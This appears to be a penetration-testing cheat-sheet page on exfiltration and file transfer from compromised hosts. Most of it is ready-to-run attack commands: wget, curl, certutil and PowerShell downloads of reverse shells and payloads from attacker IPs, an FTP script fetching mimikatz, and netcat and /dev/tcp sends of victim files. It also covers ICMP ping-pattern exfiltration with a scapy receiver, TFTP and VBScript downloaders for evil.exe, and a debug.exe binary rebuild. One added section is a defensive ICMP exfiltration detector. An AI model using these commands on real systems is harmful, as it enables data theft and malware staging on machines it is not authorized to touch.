Exfiltration

Last updated 3 years ago

Copy&Paste Base64

Linux

base64 -w0 <file>   # encode
base64 -d file      # decode

Windows

certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

Upload files

HTTPS Server

# Python 3
import http.server
import ssl

httpd = http.server.HTTPServer(('0.0.0.0', 443), http.server.SimpleHTTPRequestHandler)
# server.pem holds the certificate and its private key
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile='./server.pem')
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()

FTP

FTP server (python)

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

FTP server (NodeJS)

sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp

FTP server (pure-ftp)

apt-get update && apt-get install pure-ftpd
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Windows client

echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt

SMB

Kali as server

kali_op1> impacket-smbserver -smb2support kali `pwd`
kali_op2> smbserver.py -smb2support name /path/folder
# Share named "test" that requires the credentials test/test
impacket-smbserver -smb2support -user test -password test test `pwd`

Or create an SMB share using samba:

apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
# Add to the end of /etc/samba/smb.conf:
[public]
    comment = Samba on Ubuntu
    path = /tmp/smb
    read only = no
    browsable = yes
    guest ok = Yes
# Then restart the service:
service smbd restart

Windows

CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test

WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:

SCP

The attacker has to have SSHd running.

scp <username>@<Attacker_IP>:<directory>/<filename> 

NC

nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file

/dev/tcp

Download file from victim

nc -lvnp 80 > file                          # on the attacker
cat /path/file > /dev/tcp/10.10.10.10/80    # on the victim

Upload file to victim

nc -w5 -lvnp 80 < file_to_send.txt          # on the attacker
exec 6< /dev/tcp/10.10.10.10/80             # on the victim; the port must match the listener
cat <&6 > file.txt

thanks to @BinaryShadow_

ICMP

# Victim: send the file 4 bytes at a time as the ping fill pattern
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done

# Attacker: print the last 4 bytes of each ICMP payload seen on tun0
from scapy.all import *

def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 0:
            data = pkt[ICMP].load[-4:]
            print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)
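
Defender's view of the ICMP technique above, as an added example that is not part of the original page: it flags hosts whose echo requests carry many different repeating fill patterns, which is what `ping -p` in a loop produces. The 16-byte timestamp prefix, the incrementing default fill, the threshold and all sample packets are assumptions constructed for illustration.

```python
from collections import defaultdict

TS_LEN = 16       # assumption: 64-bit Linux iputils writes a 16-byte timestamp first
MAX_PERIOD = 16   # ping -p takes at most 16 pattern bytes
MIN_DISTINCT = 3  # assumed threshold: a single fixed pattern is a normal diagnostic

def fill_pattern(payload: bytes):
    """Return the repeating fill pattern of an echo payload, or None if none is found."""
    fill = payload[TS_LEN:]
    if len(fill) < 8:
        return None
    # Default iputils fill: incrementing bytes continuing after the timestamp.
    if all(b == (TS_LEN + i) & 0xFF for i, b in enumerate(fill)):
        return None
    for period in range(1, MAX_PERIOD + 1):
        repeats = len(fill) >= 2 * period
        if repeats and all(fill[i] == fill[i % period] for i in range(len(fill))):
            return fill[:period]  # smallest period, so "aaaa" is reported as b"a"
    return None

def suspicious_sources(packets):
    """packets: (src_ip, icmp_type, payload) tuples. Returns {src: [patterns in order]}."""
    seen = defaultdict(list)
    for src, icmp_type, payload in packets:
        if icmp_type != 8:  # echo requests carry the data off the host
            continue
        pattern = fill_pattern(payload)
        if pattern is not None:
            seen[src].append(pattern)
    return {s: p for s, p in seen.items() if len(set(p)) >= MIN_DISTINCT}

# Constructed sample traffic (not captured from a real network).
TS = bytes(TS_LEN)
SAMPLE = (
    [("10.0.0.5", 8, TS + chunk * 10) for chunk in (b"root", b":x:0", b":0:r")]
    + [("10.0.0.6", 8, TS + bytes(range(16, 56)))]               # default Linux ping
    + [("10.0.0.7", 8, TS + b"\xff" * 40)] * 5                    # ping -p ff diagnostic
    + [("10.0.0.8", 8, b"abcdefghijklmnopqrstuvwabcdefghi")]     # default Windows ping
)

if __name__ == "__main__":
    for src, patterns in suspicious_sources(SAMPLE).items():
        print(src, len(patterns), "patterned echo requests:", b"".join(patterns))
```

Joining the patterns of a flagged source in order shows which bytes left the host, which helps scope an incident.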

SMTP

If you can send data to an SMTP server, you can create an SMTP server to receive the data with Python:

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

Available by default in XP and 2003 (in other versions it needs to be explicitly added during installation).

In Kali, start TFTP server:

mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/to/nc.exe /tftp

TFTP server in python:

pip install ptftpd
ptftpd -p 69 tap0 .

In victim, connect to the Kali server:

tftp -i <KALI-IP> get nc.exe

PHP

Download a file with a PHP oneliner:

VBScript

Attacker> python -m SimpleHTTPServer 80

Victim

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

This is a crazy technique that works on Windows 32-bit machines. The idea is to use the debug.exe program. It is used to inspect binaries, like a debugger, but it can also rebuild them from hex. So we take a binary, like netcat, disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe.

Debug.exe can only assemble 64 kb, so we need to use files smaller than that. We can use upx to compress it even more. So let's do that:

Now it only weighs 29 kb. Perfect. So now let's disassemble it:

wine exe2bat.exe nc.exe nc.txt

Now we just copy-paste the text into our Windows shell, and it will automatically create a file called nc.exe.

DNS

https://github.com/62726164/dns-exfil

SimpleHttpServerWithFileUploads